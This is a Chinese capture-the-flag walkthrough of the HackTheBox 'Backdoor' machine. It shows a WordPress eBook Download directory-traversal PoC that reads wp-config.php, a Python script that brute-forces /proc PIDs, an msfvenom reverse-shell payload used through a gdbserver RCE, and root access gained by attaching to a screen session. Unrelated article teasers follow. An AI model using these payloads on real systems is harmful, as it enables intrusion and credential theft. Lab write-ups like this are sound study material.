Linux/Backdoor

Backdoor

Enumeration

nmap

第一次扫描发现系统对外开放了22,80和1337端口,端口详细信息如下

22端口对应的是ssh服务,80端口使用Apache,title上写着backdoor,而且可以看出使用了wordpress,1337端口暂时还不能确定

TCP/80

访问页面,经典的wordpress风格,一访问页面就可以看到页面四个链接,分别是home,about,blog,contact,点击home跳转失败,显示无法识别域名backdoor.htb,需要将其添加到/etc/hosts中。剩下三个也只能看到一些基础信息,没什么好玩的

配置完成能够解析域名后,访问该链接,但是并没有发现什么可以利用的东西

可以尝试枚举一些目录,wordpress默认的插件安装目录是/wp-content/plugins

可以看到默认的index.php目录已经被删除,可以看到该目录下只有一个电子书下载的插件和一个hello.php,在电子书下载插件目录中,有一个readme文档,其中揭露了插件的版本为1.1

Exploitation

WordPress Plugin eBook Download 1.1 - Directory Traversal

在知道了一些基本信息后,可以搜索相关内容看看是否存在已知的漏洞,可以直接拿来利用

该目录遍历漏洞详情如下,可以看到我们需要能够访问filedownload.php文件,而在wp-content目录下确实有这个php文件,然后利用目录遍历去请求wp-config.php文件,从该文件的名字也能看出来其中包含了很多配置信息

# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

按照上文Poc读取指定文件,然后在其中发现了一些有关数据库的凭据信息

有了一个密码,又存在LFI,考虑读取/etc/passwd内容,然后看某个用户能否使用数据库密码登录,有一个user用户,但是并不能成功登录ssh

/proc/{PID}/cmdline

在最开始发现系统还对外开放了1337端口,但是这个端口使用curl,ncat,telnet等方式均无法访问,因为存在LFI,可以读取远程主机中关于1337端口对应服务的信息

需要使用暴力破解/proc/{pid}/cmdline文件的方式来实现,在linux中,该文件用于显示运行对应PID进程时的命令,可以先运行一个tcpdump程序,使用ps -aux | grep tcpdump命令来查看相应程序的pid,最后查看/proc/{pid}/cmdline文件,现实的就是运行tcpdump的命令

运行tcpdump程序后查看相应程序的pid

将获取到的pid填入对应位置,查看15806,得到结果如下,显示了执行时的命令

Brute Force PID

现在,我们可以尝试利用burpsuite的暴力破解来看看1337端口到底在运行什么服务,通过简单测试,发现可行,那么只需要将请求包发送给intruder,然后检索1-1000的内容

也可以写python脚本来爆破,写一个pid的循环,然后请求url,最后打印输出

import requests
from bs4 import BeautifulSoupfor i in range(1,1000):url = "http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/"+str(i)+"/cmdline"req = requests.get(url)print(req.text.replace('<script>window.close()</script>',''))

经过漫长的暴力破解,最终在pid为852的进程中看到了1337端口,运行着gdbserver

GDB是GNU项目的调试器,是一种调试工具,gdbserver是可以远程运行GDB的一个应用程序,搜索发现gdbserver 9.2版本存在rce漏洞

GNU gdbserver 9.2 - Remote Command Execution (RCE)

虽然暂时无法确定目标系统使用的版本,但是值得一试


msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 PrependFork=true -orev.bin

在本地监听4444端口,然后执行指令即可得到shell

Privilege Escalation

之前得到的密码也没起到什么作用,但是之前在爆破pid时还发现pid为850的进程是root运行的,可以看看是什么

screen是一个类似于tmux的终端多路复用器,可用于启动会话,然后在该会话内打开任意数量的虚拟终端,即使窗口不可见或者断开链接,在screen中运行的进程也将继续运行,会话分离时,最初从屏幕启动的进程仍在运行并由本身管理。

screen -dmS root意味着screen会话以分离模式启动,该会话被命名为“root”,,当创建新的屏幕会话时,会在/var/run/screen位置创建一个新目录,名称为s-{username},在此目录中使用屏幕会话名称创建屏幕会话文件,可以使用用户dotguy在本地创建一个屏幕会话,名称为test_session

用于附加到为不同用户创建的屏幕会话的默认屏幕语法是screen -x user/session_name

但是提示需要添加终端类型,可以输入以下指令

export TERM=xterm
screen -x root/root

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/771195.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

HyperWorks2023 下载地址及安装教程

HyperWorks是一套由Altair Engineering开发的集成化仿真平台。这个平台涵盖了许多不同领域的仿真和优化应用&#xff0c;包括结构分析、流体力学、多体动力学、优化、电磁场分析等。 HyperWorks提供了一系列强大的工具和模块&#xff0c;用于进行复杂的工程仿真和优化任务。它…

Rust 的 HashMap 特定键值元素值的累加方法

在Rust中&#xff0c;如果你想要对HashMap中特定键对应的值进行累加操作&#xff0c;你需要首先检查该键是否已存在。如果存在&#xff0c;则取出其值&#xff0c;进行累加&#xff0c;然后将结果存回HashMap。如果不存在&#xff0c;则可能需要插入一个新的键值对&#xff0c;…

Unity VideoPlayer 全屏到 FGUI

需求&#xff1a; 利用VideoPlayer将视频全屏显示到FGUI上。 解决方案&#xff1a; 在FGUI上创建一个全屏UI&#xff0c;创建一个装载器&#xff0c;大小设置为全屏。 设置 VideoPlayer 的渲染方式为 RenderMode.RenderTexture. 创建RenderTexture&#xff0c;&#xff08;将视…

数据结构 之 队列习题 力扣oj(附加思路版)

优先级队列 #include<queue> --队列 和 优先级队列的头文件 优先级队列&#xff1a; 堆结构 最大堆 和 最小堆 相关函数&#xff1a; front() 获取第一个元素 back() 获取最后一个元素 push() 放入元素 pop() 弹出第一个元素 size() 计算队列中元素…

简单了解synchronized

什么是synchronized synchronized是Java提供的一个关键字&#xff0c;用于方法或者代码块&#xff0c;保证并发安全。 synchronized使用场景 同步代码块&#xff08;原子性&#xff09; synchronized可以用在方法上&#xff0c;或者用在代码块。 可锁的对象可以是普通对象…

JQ操作Dom(下)

一、设置样式 <div>设置样式</div> <script type"text/javascript">//设置一条样式$(div).css(background-color,red);//设置多条样式使用类名的方式 </script> <div>设置样式 </div> <script type"text/javascript&q…

C++语法|C++八股|内存泄漏杂谈

文章目录 定义分类防⽌内存泄露的方法 定义 内存泄漏是指已分配的内存未能成功释放&#xff0c;并且程序失去了对该内存的控制&#xff0c;因此无法再次使用或释放。随着程序的运行&#xff0c;内存泄漏会逐渐积累&#xff0c;最终可能导致内存不足&#xff0c;影响程序的性能…

Spring Boot设置io临时目录

在部署springboot项目&#xff0c;使用MultipartFile上传文件会出现以下异常 Failed to parse multipart servlet request; nested exception is java.io.IOException: The temporary upload location [/tmp/tomcat.3016596448718765136.18001/work/Tomcat/localhost/xx] is …

【ZZULI数据结构实验一】多项式的三则运算

【ZZULI数据结构实验一】多项式的四则运算 ♋ 结构设计♋ 方法声明♋ 方法实现&#x1f407; 定义一个多项式类型并初始化---CreateDataList&#x1f407; 增加节点---Getnewnode&#x1f407; 打印多项式类型的数据-- PrintPoly&#x1f407; 单链表的尾插--Listpush_back&…

C++ 优先级与结合性

运算优先级和结合性 表达式有多种运算符混合使用时&#xff0c;求解表达式的值&#xff0c;首先要解决各种运算符的运算优先次序问题。即&#xff0c;优先级和结合性。 例如&#xff1a;下面表达式的值取决于5种运算符的优先次序。 优先级是指不同级别运算符之间的运算次序&am…

VC++ class wizard介绍

Visual C的集成开发环境向用户提供了一个功能很强的操作类的工具—ClassWizard&#xff0c;我们可以利用该工具非常方便地向应用程序中添加类、向类中添加消息处理函数、成员函数、以及添加成员变量等。 一 、ClassWizard简介 ClassWizard既可以操作由AppWizard在应用程序框架…

海量数据处理项目-账号微服务和流量包数据库表+索引规范(上)

海量数据处理项目-账号微服务和流量包数据库表索引规范&#xff08;上&#xff09; 第1集 账号微服务和流量包数据库表索引规范讲解《上》 简介&#xff1a;账号微服务和流量包数据库表索引规范讲解 短链平台大课难度层级曲线图&#xff1a;由浅入深 索引规范 主键索引名为…

卡行领航家用户端是怎么拼团怎么挣钱的?

#领航家代理政策/怎么代理/奖金制度/双2.0模式# 全国V&#xff1a;ok1234vip 领航家用户端&#xff1a;0.52费率 一次拼团0.44费率 两次拼团0.36费率 三次拼团0.2费率 ………… 十次拼团&#xff0c;客户每月挣20480 领航家代理端&#xff1a;无押激活返现高达166/台 分润万5-万…

Shell教程_不同Shell中管道操作符的差异

Shell教程_不同Shell中管道操作符的差异 不同的 Unix / Linux Shell (如 Bash, Zsh, Csh 和 Fish 等) 在语法方面存在一些差异, 主要是因为它们采用了不同的设计理念和语法规则。 这些差异在编写 Shell 脚本或在命令行中使用不同的 Shell 时可能会引起困惑和问题。 因此, 有…

P1383 高级打字机(可持续化线段树)

题目描述 早苗入手了最新的高级打字机。最新款自然有着与以往不同的功能&#xff0c;那就是它具备撤销功能&#xff0c;厉害吧。 请为这种高级打字机设计一个程序&#xff0c;支持如下 33 种操作&#xff1a; T x&#xff1a;Type 操作&#xff0c;表示在文章末尾打下一个小…

vue 中实现下载后端返回的流式数据

验证是否是blob /*** Event 验证是否为blob格式* */export async function blobValidate(data) {try {const text await data.text();JSON.parse(text);return false;} catch (error) {return true;}}get请求 /*** Event: get请求下载后端返回的数据流* description: url[Stri…

RockyLinux8 RockyLinux9安装postgresql16-devel开发包

1、PG的插件扩展有些需要自行编译&#xff0c;需要安装PG开发包 2、RockyLinux8安装 #创建用户先 useradd postgressudo dnf install -y https://download.postgresql.org/pub/repos/yum/reporpms/EL-8-x86_64/pgdg-redhat-repo-latest.noarch.rpm sudo dnf -qy module disab…

计算机网络复试总结(五)

可能会问&#xff1a; 基础知识问题&#xff1a; 请简述TCP/IP协议栈的层次结构及其功能。 TCP/IP协议栈的层次结构及其功能可以简要概述如下&#xff1a; 层次结构&#xff1a; TCP/IP协议栈通常被划分为四个主要层次&#xff0c;从底层到高层分别是网络接口层&#xff08;也…

Flutter 旋转动画 线性变化的旋转动画

直接上代码 图片自己添加一张就好了 import dart:math;import package:flutter/material.dart;import package:flutter/animation.dart;void main() > runApp(MyApp()); //旋转动画 class MyApp extends StatelessWidget {overrideWidget build(BuildContext context) {re…

【python】正则表达式

文章目录 正则表达式对象re.RegexObjectre.MatchObject符号说明匹配基础匹配?=、?<=、?!、?<!字符类re模块编译正则表达式compile 函数匹配字符串re.matchre.searchre.findallre.finditer替换字符串re.sub分割字符串re.split正则表达式修饰符 - 可选标志主要用于网页…